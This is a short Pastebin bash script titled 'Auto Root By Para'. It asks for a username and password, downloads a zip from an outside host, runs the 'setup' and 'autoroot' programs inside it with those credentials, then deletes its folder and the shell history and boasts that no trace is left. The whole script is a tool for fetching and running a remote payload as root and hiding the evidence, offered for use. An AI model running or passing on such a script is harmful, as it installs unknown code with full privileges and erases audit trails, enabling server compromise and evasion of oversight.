Advertisement
Cries

Auto Root By Para

Jun 4th, 2016
372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. #!/bin/bash
  2. BLACK='\e[0;30m' # MADE BY PARA
  3. BLUE='\e[0;34m'
  4. GREEN='\e[0;32m'
  5. CYAN='\e[0;36m'
  6. RED='\e[0;31m'
  7. PURPLE='\e[0;35m'
  8. # MADE BY PARA
  9. BROWN='\e[0;33m'
  10. LIGHTGRAY='\e[0;37m'
  11. DARKGRAY='\e[1;30m'
  12. LIGHTBLUE='\e[1;34m'
  13. LIGHTGREEN='\e[1;32m'
  14. LIGHTCYAN='\e[1;36m'
  15. LIGHTRED='\e[1;31m'
  16. LIGHTPURPLE='\e[1;35m'
  17. YELLOW='\e[1;33m'
  18. WHITE='\e[1;37m'
  19. NC='\e[0m'
  20.  
  21. # MADE BY PARA
  22. clear
  23. echo -e "${LIGHTRED}AUTO ROOT MADE BY RIFT"
  24. echo -e "${WHITE} Installing Components First"
  25. yum -y install wget unzip; apt-get -y install unzip wget
  26. echo -e "Done Now Starting the Auto Root"
  27. echo -e "${LIGHTCYAN} Enter User: ${CYAN}"
  28. read USER
  29. echo -e "${LIGHTCYAN} Enter Password: ${CYAN}"
  30. read PASS
  31. mkdir /root/.para; cd /root/.para; wget -q https://thug.li/Umb.zip; unzip Umb.zip; cd Kit; chmod 777 *; ./setup; sh autoroot $USER $PASS; cd /root rm -rf .riftroot; rm -rf ~/.bash_history; history -c
  32. echo -e "${WHITE}AUTO ROOT DONE :D"
  33. echo -e "Bash History Cleared And No Trace Left -Para"
  34. # MADE BY PARA
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement